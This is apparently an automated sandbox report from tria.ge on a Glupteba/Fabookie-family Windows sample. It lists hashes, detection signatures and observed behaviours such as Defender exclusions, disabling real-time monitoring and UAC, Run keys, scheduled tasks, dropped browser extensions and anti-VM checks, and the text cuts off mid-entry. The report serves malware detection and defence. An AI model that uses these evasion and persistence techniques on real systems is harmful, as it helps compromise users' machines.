Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
294s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04/02/2024, 03:41
Static task
static1
Behavioral task
behavioral1
Sample
57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Resource
win7-20231215-en
General
-
Target
57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
-
Size
177KB
-
MD5
05e32cf85ff2c9c7bc92d6b751c02b1b
-
SHA1
95e91a3893640d9f9dd80cf5f0f820de54fccd2a
-
SHA256
57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d
-
SHA512
fc81e09eedb9ca907ab54cebe0f3f54cebc86f36fe036dcf0a97c131ccc5ae67832dbe902ae470b23c0dad62708555f5a4c2b4a9a71592ba5d42ee868322ed67
-
SSDEEP
3072:7gMyg1MbPUWdfkUXjqYffa6R2sChyJz2OgpnGaxNTgiqOweoUEMF98sDMOSx:sgw8WdxTqcfaO2sbJbgvxNTg0weJ/W
Malware Config
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral1/memory/1852-414-0x0000000003540000-0x000000000366C000-memory.dmp family_fabookie behavioral1/memory/1852-422-0x0000000003540000-0x000000000366C000-memory.dmp family_fabookie -
Glupteba payload 1 IoCs
resource yara_rule behavioral1/memory/544-192-0x0000000002B30000-0x000000000341B000-memory.dmp family_glupteba -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0" lhuGc8cD8YBgMslw3CZs4Nqs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0" 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 100 2900 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2844 netsh.exe 2616 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\International\Geo\Nation JUNRlIz.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O5wIQhpWgLP7UEf4RlQSymbg.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CKLB7On53h12fq7Foi6NaiQn.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qYRxbFWhFHxAovei7jZ0tgvr.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5Dko4QvrCUvoej3yhR41KSvY.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BgCvBfSl7tNkEwscYTOTD25q.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcZBdNwX1Cz8vI68m250iIBr.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NiQvhTUtNTg97Gy0ZDO1nmki.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CHcPwIDQzspiKJ4r7CublNdr.bat CasPol.exe -
Executes dropped EXE 19 IoCs
pid Process 540 cmd.exe 544 conhost.exe 1872 3abumA8EPhmpkupXkwlsWKNH.exe 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 700 conhost.exe 2960 Install.exe 2156 csrss.exe 1852 OQrMVozqayLadUiGGxpM2SWK.exe 2556 Install.exe 1628 patch.exe 2596 injector.exe 1716 wxzSv0RPCLFiIJpPm8GSlIWp.exe 2268 eYLayuZ.exe 2848 windefender.exe 2348 windefender.exe 1948 JUNRlIz.exe -
Loads dropped DLL 40 IoCs
pid Process 1800 CasPol.exe 1800 CasPol.exe 1800 CasPol.exe 1800 CasPol.exe 1800 CasPol.exe 1872 3abumA8EPhmpkupXkwlsWKNH.exe 1800 CasPol.exe 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 1800 CasPol.exe 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 2960 Install.exe 2960 Install.exe 2960 Install.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 1800 CasPol.exe 2960 Install.exe 2556 Install.exe 2556 Install.exe 2556 Install.exe 864 Process not Found 1872 3abumA8EPhmpkupXkwlsWKNH.exe 1628 patch.exe 1628 patch.exe 1628 patch.exe 1628 patch.exe 1628 patch.exe 2156 csrss.exe 1800 CasPol.exe 1800 CasPol.exe 1628 patch.exe 1628 patch.exe 1628 patch.exe 2900 rundll32.exe 2900 rundll32.exe 2900 rundll32.exe 2900 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0031000000018646-199.dat upx behavioral1/memory/1872-209-0x0000000000110000-0x00000000005F8000-memory.dmp upx behavioral1/files/0x0031000000018646-201.dat upx behavioral1/files/0x0031000000018646-202.dat upx behavioral1/memory/1872-432-0x0000000000110000-0x00000000005F8000-memory.dmp upx behavioral1/memory/2848-484-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2348-486-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2848-485-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2348-502-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2348-523-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0" lhuGc8cD8YBgMslw3CZs4Nqs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0" Ahzn2Szwr26hfrPXyZRPFZkG.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0" 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths cmd.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" lhuGc8cD8YBgMslw3CZs4Nqs.exe Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json JUNRlIz.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json JUNRlIz.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 pastebin.com 6 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 300 bcdedit.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JUNRlIz.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini eYLayuZ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 JUNRlIz.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eYLayuZ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA JUNRlIz.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C JUNRlIz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 JUNRlIz.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol eYLayuZ.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 700 set thread context of 1800 700 conhost.exe 30 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN lhuGc8cD8YBgMslw3CZs4Nqs.exe File opened (read-only) \??\VBoxMiniRdrDN Ahzn2Szwr26hfrPXyZRPFZkG.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\mpwJHFM.dll JUNRlIz.exe File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\nwEoeMi.xml JUNRlIz.exe File created C:\Program Files (x86)\FohpjzYDshfCC\RFVLhGx.xml JUNRlIz.exe File created C:\Program Files (x86)\KCGdmeQdU\epaRtk.dll JUNRlIz.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JUNRlIz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi JUNRlIz.exe File created C:\Program Files (x86)\hgFvgKbJayUn\WikVRHL.dll JUNRlIz.exe File created C:\Program Files (x86)\KCGdmeQdU\fcltJmr.xml JUNRlIz.exe File created C:\Program Files (x86)\FohpjzYDshfCC\ojxihoQ.dll JUNRlIz.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak JUNRlIz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja JUNRlIz.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\uehpZamRStCkJ.dll JUNRlIz.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\BzYRdwG.xml JUNRlIz.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job schtasks.exe File created C:\Windows\unins000.dat conhost.exe File opened for modification C:\Windows\rss Ahzn2Szwr26hfrPXyZRPFZkG.exe File opened for modification C:\Windows\rss lhuGc8cD8YBgMslw3CZs4Nqs.exe File created C:\Windows\rss\csrss.exe lhuGc8cD8YBgMslw3CZs4Nqs.exe File created C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab reg.exe File created C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job conhost.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job schtasks.exe File created C:\Windows\is-APIAD.tmp conhost.exe File opened for modification C:\Windows\unins000.dat conhost.exe File created C:\Windows\rss\csrss.exe Ahzn2Szwr26hfrPXyZRPFZkG.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\SMPpzaSdDqsJvHF.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 700 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2628 schtasks.exe 2416 schtasks.exe 2592 schtasks.exe 2392 schtasks.exe 1600 schtasks.exe 1616 schtasks.exe 1196 schtasks.exe 1312 schtasks.exe 1136 schtasks.exe 2276 schtasks.exe 2328 schtasks.exe 2772 schtasks.exe 2580 schtasks.exe 1600 schtasks.exe 3052 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\da-84-01-ce-37-86 JUNRlIz.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local 